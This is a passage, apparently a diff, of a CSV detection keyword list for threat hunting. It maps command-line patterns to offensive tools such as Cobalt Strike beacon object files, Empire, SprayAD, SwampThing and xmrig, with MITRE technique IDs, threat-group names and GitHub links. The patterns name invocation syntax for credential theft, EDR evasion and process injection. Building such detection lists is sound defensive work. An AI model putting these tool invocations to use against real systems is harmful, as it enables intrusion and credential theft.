T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/med0x2e/SigFlip,1,0,N/A,10,10,884,165,2023-08-27T18:27:50Z,2021-08-08T15:59:19Z -sleeper force,offensive_tool_keyword,cobaltstrike,Collection of Beacon Object Files (BOF) for Cobalt Strike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/crypt0p3g/bof-collection,1,0,N/A,10,10,151,25,2022-12-05T04:49:33Z,2021-01-20T06:07:38Z -sleeper off,offensive_tool_keyword,cobaltstrike,Collection of Beacon Object Files (BOF) for Cobalt Strike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/crypt0p3g/bof-collection,1,0,N/A,10,10,151,25,2022-12-05T04:49:33Z,2021-01-20T06:07:38Z -sleeper on,offensive_tool_keyword,cobaltstrike,Collection of Beacon Object Files (BOF) for Cobalt Strike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/crypt0p3g/bof-collection,1,0,N/A,10,10,151,25,2022-12-05T04:49:33Z,2021-01-20T06:07:38Z -sniffer -*,offensive_tool_keyword,sniffer,A modern alternative network traffic sniffer.,T1040 - T1052.001 - T1046 - T1552.002,TA0011 - TA0007 - TA0005,N/A,N/A,Sniffing & Spoofing,https://github.com/chenjiandongx/sniffer,1,0,N/A,N/A,7,668,58,2022-07-27T15:13:57Z,2021-11-08T15:36:03Z -spawn *.exe *.bin*,offensive_tool_keyword,cobaltstrike,Cobalt Strike BOF that spawns a sacrificial process. injects it with shellcode. and executes payload. Built to evade EDR/UserLand hooks by spawning sacrificial process with Arbitrary Code Guard (ACG). BlockDll. and PPID spoofing.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/boku7/spawn,1,0,N/A,10,10,407,71,2023-03-08T15:53:44Z,2021-07-17T16:35:59Z -SprayAD * * ,offensive_tool_keyword,C2-Tool-Collection,A collection of tools which integrate with Cobalt Strike (and possibly other C2 frameworks) through BOF and reflective DLL loading techniques,T1055 - T1218 - T1059 - T1027,TA0002 - TA0003 - TA0008,N/A,N/A,C2,https://github.com/outflanknl/C2-Tool-Collection,1,0,N/A,10,10,885,152,2023-05-03T19:35:38Z,2022-04-22T13:43:35Z -SprayAD.exe *,offensive_tool_keyword,C2-Tool-Collection,A collection of tools which integrate with Cobalt Strike (and possibly other C2 frameworks) through BOF and reflective DLL loading techniques,T1055 - T1218 - T1059 - T1027,TA0002 - TA0003 - TA0008,N/A,N/A,C2,https://github.com/outflanknl/C2-Tool-Collection,1,0,N/A,10,10,885,152,2023-05-03T19:35:38Z,2022-04-22T13:43:35Z -ss -lntp*,greyware_tool_keyword,ss,replace netstat command - service listening,T1049 - T1040,TA0007 - TA0009,N/A,N/A,Discovery,N/A,1,0,N/A,6,10,N/A,N/A,N/A,N/A -sudomy -*,offensive_tool_keyword,Sudomy,Sudomy is a subdomain enumeration tool to collect subdomains and analyzing domains performing automated reconnaissance (recon) for bug hunting / pentesting,T1595 - T1046,TA0002,N/A,N/A,Reconnaissance,https://github.com/screetsec/Sudomy,1,0,N/A,N/A,10,1718,352,2023-09-19T08:38:55Z,2019-07-26T10:26:34Z -SwampThing.csproj,offensive_tool_keyword,SwampThing,SwampThing lets you to spoof process command line args (x32/64). Essentially you create a process in a suspended state - rewrite the PEB - resume and finally revert the PEB. The end result is that logging infrastructure will record the fake command line args instead of the real ones,T1036.005 - T1564.002,TA0004 - TA0005,N/A,N/A,Defense Evasion,https://github.com/FuzzySecurity/Sharp-Suite/tree/master/SwampThing,1,1,N/A,N/A,10,1069,209,2022-12-22T23:57:19Z,2018-12-10T00:08:37Z -TokenStrip *,offensive_tool_keyword,cobaltstrike,Beacon Object File to delete token privileges and lower the integrity level to untrusted for a specified process,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/nick-frischkorn/TokenStripBOF,1,0,N/A,10,10,28,5,2022-06-15T21:29:24Z,2022-06-15T02:13:13Z -token-vault create*,offensive_tool_keyword,cobaltstrike,In-memory token vault BOF for Cobalt Strike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Henkru/cs-token-vault,1,0,N/A,10,10,128,25,2022-08-18T11:02:42Z,2022-07-29T17:50:10Z -token-vault remove*,offensive_tool_keyword,cobaltstrike,In-memory token vault BOF for Cobalt Strike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Henkru/cs-token-vault,1,0,N/A,10,10,128,25,2022-08-18T11:02:42Z,2022-07-29T17:50:10Z -token-vault set *,offensive_tool_keyword,cobaltstrike,In-memory token vault BOF for Cobalt Strike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Henkru/cs-token-vault,1,0,N/A,10,10,128,25,2022-08-18T11:02:42Z,2022-07-29T17:50:10Z -token-vault show*,offensive_tool_keyword,cobaltstrike,In-memory token vault BOF for Cobalt Strike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Henkru/cs-token-vault,1,0,N/A,10,10,128,25,2022-08-18T11:02:42Z,2022-07-29T17:50:10Z -token-vault use*,offensive_tool_keyword,cobaltstrike,In-memory token vault BOF for Cobalt Strike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Henkru/cs-token-vault,1,0,N/A,10,10,128,25,2022-08-18T11:02:42Z,2022-07-29T17:50:10Z -uselistener http*,offensive_tool_keyword,empire,Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/BC-SECURITY/Empire,1,0,N/A,N/A,10,3589,533,2023-09-08T05:50:59Z,2019-08-01T04:22:31Z -usemodule */*,offensive_tool_keyword,empire,Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/BC-SECURITY/Empire,1,0,N/A,N/A,10,3589,533,2023-09-08T05:50:59Z,2019-08-01T04:22:31Z -usestager *,offensive_tool_keyword,empire,Empire commands. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1155,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -wapiti -*,offensive_tool_keyword,wapiti,Web vulnerability scanner written in Python3,T1592 - T1592.003,TA0007 - TA0040,N/A,N/A,Web Attacks,https://github.com/wapiti-scanner/wapiti,1,1,N/A,N/A,8,785,132,2023-09-27T07:26:22Z,2020-06-06T20:17:55Z +"keyword","metadata_keyword_type","metadata_tool","metadata_description","metadata_tool_techniques","metadata_tool_tactics","metadata_malwares_name","metadata_groups_name","metadata_category","metadata_link","metadata_enable_endpoint_detection","metadata_enable_proxy_detection","metadata_comment","metadata_severity_score","metadata_popularity_score","metadata_github_stars","metadata_github_forks","metadata_github_updated_at","metadata_github_created_at" +"* --coin=monero*","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","0","N/A","9","10","7770","3472","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z" +"* - Sensitive Accounts.csv*","offensive_tool_keyword","ACLight","A tool for advanced discovery of Privileged Accounts - including Shadow Admins.","T1087 - T1003 - T1208","TA0001 - TA0006 - TA0008","N/A","N/A","AD Enumeration","https://github.com/cyberark/ACLight","1","0","N/A","7","8","730","150","2019-09-09T06:48:45Z","2017-05-17T09:29:41Z" +"* - ShadowSpray*","offensive_tool_keyword","ShadowSpray","A tool to spray Shadow Credentials across an entire domain in hopes of abusing long forgotten GenericWrite/GenericAll DACLs over other objects in the domain.","T1110.003 - T1098 - T1059 - T1075","TA0001 - TA0008 - TA0009","N/A","N/A","Discovery","https://github.com/ShorSec/ShadowSpray","1","0","N/A","7","5","408","72","2022-10-14T13:36:51Z","2022-10-10T08:34:07Z" +"* $exploit_oneliner*","offensive_tool_keyword","cobaltstrike","The Elevate Kit demonstrates how to use third-party privilege escalation attacks with Cobalt Strike's Beacon payload.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/ElevateKit","1","0","N/A","10","10","813","205","2020-06-22T21:12:24Z","2016-12-08T03:51:09Z" +"* $FodHelperPath*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-FodHelperBypass.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"* $lse_find_opts *","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","0","N/A","9","10","2925","535","2023-09-17T10:27:49Z","2019-02-13T11:02:21Z" +"* $payload_oneliner *","offensive_tool_keyword","cobaltstrike","The Elevate Kit demonstrates how to use third-party privilege escalation attacks with Cobalt Strike's Beacon payload.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rsmudge/ElevateKit","1","0","N/A","10","10","813","205","2020-06-22T21:12:24Z","2016-12-08T03:51:09Z" +"* * 0x* - HOOK DETECTED*","offensive_tool_keyword","HookDetector","Detects hooked Native API functions in the current process indicating the presence of EDR ","T1055.012 - T1082 - T1057","TA0007 - TA0003","N/A","N/A","Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/HookDetector","1","0","N/A","10","10","1214","252","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" +"* */lsass.o*","offensive_tool_keyword","cobaltstrike","Collection of CobaltStrike beacon object files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/pwn1sher/CS-BOFs","1","0","N/A","10","10","100","23","2022-02-14T09:47:30Z","2021-01-18T08:54:48Z" +"* ./sf.py -l 127.0.0.1:5001*","offensive_tool_keyword","spiderfoot","The OSINT Platform for Security 